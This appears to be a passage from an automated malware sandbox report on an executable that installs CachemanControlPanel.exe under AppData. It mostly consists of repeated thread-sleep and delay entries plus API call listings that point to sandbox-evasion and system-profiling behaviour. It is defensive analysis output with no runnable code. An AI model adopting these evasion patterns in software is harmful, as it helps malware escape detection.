    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -39304s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -39195s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -39085s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38976s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38867s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38757s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38648s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38539s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38428s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38319s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38210s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -38101s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37992s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37882s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37773s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37664s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37555s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37445s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37335s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37226s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37116s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -37005s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36898s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36788s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36680s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36570s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36460s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36351s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36242s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36132s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -36023s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35914s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35803s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35695s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35586s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35476s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35365s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35258s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35148s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -35039s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34929s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34819s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34711s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34601s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34491s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34382s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34273s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34164s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -34054s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33944s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33835s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33726s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33617s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33507s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33395s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33289s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33179s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -33070s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32961s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32852s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32742s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32633s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32523s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32414s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32304s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32195s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -32086s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31976s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31865s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31758s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31648s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31539s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31430s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31320s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31211s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -31101s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30992s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30882s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30770s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30664s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30554s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30445s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30336s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30226s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30117s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30008s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -260000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259884s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259778s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259669s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259560s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259450s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259341s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259232s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259122s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -259013s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258899s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258794s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258685s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258576s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258466s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258356s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258246s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258138s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -258029s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257919s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257810s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257701s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257591s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257482s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257372s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257263s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257153s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -257044s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256935s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256825s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256716s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256606s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256497s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256388s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256277s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256169s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -256060s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -255951s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -255841s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -255732s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -255622s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -255513s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 6992Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -255412s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe TID: 4996Thread sleep time: -255297s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_0040646B FindFirstFileA,FindClose,1_2_0040646B
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
    Source: C:\Users\user\Desktop\dY5HmgsBm6.exeCode function: 1_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_004058BF
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040C837 wcsncpy,wcslen,wcscat,GetDriveTypeW,FindFirstFileW,FindClose,GetFileAttributesW,GetDriveTypeW,2_2_0040C837
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeCode function: 2_2_0040C514 memset,GetSystemInfo,GlobalMemoryStatusEx,2_2_0040C514
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 59000Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58894Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58786Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58678Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58569Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58454Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58351Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58241Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58132Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 58023Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57913Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57804Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57695Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57585Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57476Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57365Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57257Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57148Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 57039Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56929Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56819Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56711Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56601Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56491Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56382Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56272Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56163Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 56053Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55945Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55835Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55726Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55616Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55507Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55398Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55288Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55179Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 55070Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54960Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54851Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54741Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54632Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54523Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54414Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54304Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54195Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 54085Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53976Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53861Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53757Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53648Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53537Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53429Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53320Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53210Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 53101Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52991Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52882Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52773Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52663Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52554Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52445Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52335Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52226Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52117Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 52007Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51898Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51789Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51679Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51570Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51461Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51351Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51241Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51132Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 51023Jump to behavior
    Source: C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exeThread delayed: delay time: 50913Jump to behavior
